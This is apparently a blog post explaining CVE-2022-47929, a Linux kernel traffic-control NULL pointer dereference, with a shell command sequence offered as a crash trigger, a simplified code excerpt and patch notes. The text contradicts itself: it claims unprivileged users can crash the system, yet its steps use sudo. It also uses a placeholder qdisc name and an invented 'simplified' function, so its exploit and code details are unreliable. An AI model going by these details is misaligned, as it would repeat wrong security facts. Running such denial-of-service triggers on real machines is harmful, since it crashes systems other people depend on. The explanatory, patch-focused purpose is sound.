CVE-2022-47929 - Linux Kernel Traffic Control Panic Exploit—A Simple Guide

---

Introduction

In early 2023, a Denial of Service (DoS) vulnerability in the Linux kernel was quietly patched. Labeled CVE-2022-47929, this bug lets *any unprivileged user* crash a Linux system (kernel version before 6.1.6) using only built-in traffic control tools (tc). The slip-up lives in the kernel's traffic control system, specifically the qdisc_graft function within net/sched/sch_api.c. Let's walk through what happened, how it works, and why it matters.

What is Traffic Control in Linux?

Linux lets admins shape network flows and bandwidth using *traffic control* (tc)—a part of the kernel that manages "queues" (Qdiscs) for sending network packets. Through commands like tc qdisc and tc class, you can define, change, or delete queueing policies.

The Problem: NULL Pointer Dereference

In kernel versions *before* 6.1.6, if you set up certain (bad) combinations with tc qdisc and tc class, you could trigger what’s called a NULL pointer dereference—a bug where the kernel tries to use a piece of memory that’s set to zero (NULL). This makes Linux hit a panic and *crash immediately*.

The key culprit: the qdisc_graft handler in net/sched/sch_api.c. Under the hood, if crafting a Qdisc scenario with missing or half-set parameters, the kernel code would sometimes mistakenly try to access a struct that hadn’t actually been set up—causing the system to fold.

Exploit Details

This bug doesn't need special permissions: as *any* user, you could use network control tools to crash the whole system. To trigger the bug, you'd use tc to:

Here’s a real-world example snippet that could crash a vulnerable machine

# Step 1: Make a veth (virtual ethernet) pair for testing
sudo ip link add veth type veth peer name veth1 
sudo ip link set veth up
sudo ip link set veth1 up

# Step 2: Add a root qdisc with 'prio' type (affected)
tc qdisc add dev veth root handle 1: prio

# Step 3: Add a class under the qdisc (crafted bad config)
tc class add dev veth parent 1:1 classid 1:10 prio bands 4

# Step 4: Now, add a qdisc to the new class without needed parameters
tc qdisc add dev veth parent 1:10 handle 10: someqdisc

On a vulnerable Linux machine, this may instantly freeze or reboot your box.

*Note: Exact triggering steps can vary depending on distro and kernel build. For safety, don’t run on a production system.*

Here’s a look at the vulnerable kernel code flow (simplified)

int qdisc_graft(struct net_device *dev, unsigned long cl, struct Qdisc *new)
{
    struct Qdisc *old;

    // ... setup code ...

    if (!new)
        return -EINVAL;

    /* Vulnerable spot: old can be NULL here! */
    old = dev->qdisc;

    if (old->some_member) {  // <--- Potential NULL pointer dereference here
        // ...crashes system if old is NULL...
    }

    // ... rest of the function ...
}

If the configuration sent by userspace skipped required pieces, the kernel could end up dereferencing old, even though it was still NULL.

Patch & Resolution

The bug was fixed in commit 5b353f025d (“net_sched: sch_qdisc: fix null pointer deref in qdisc_graft()”), released with Linux 6.1.6.

References

- CVE Details: CVE-2022-47929
- Original Patch/Commit
- OSS Security Advisory

Conclusion

CVE-2022-47929 is a striking reminder that even "small" kernel bugs can cause massive disruptions—from development laptops to production servers. Always keep your systems updated and be careful which users get access to network stack tools like tc.

If you’re managing Linux systems, double-check your kernel version and patch history. This kernel panic can strike any unpatched machine—sometimes with just one command.

Timeline

Published on: 01/17/2023 21:15:00 UTC
Last modified on: 03/03/2023 01:15:00 UTC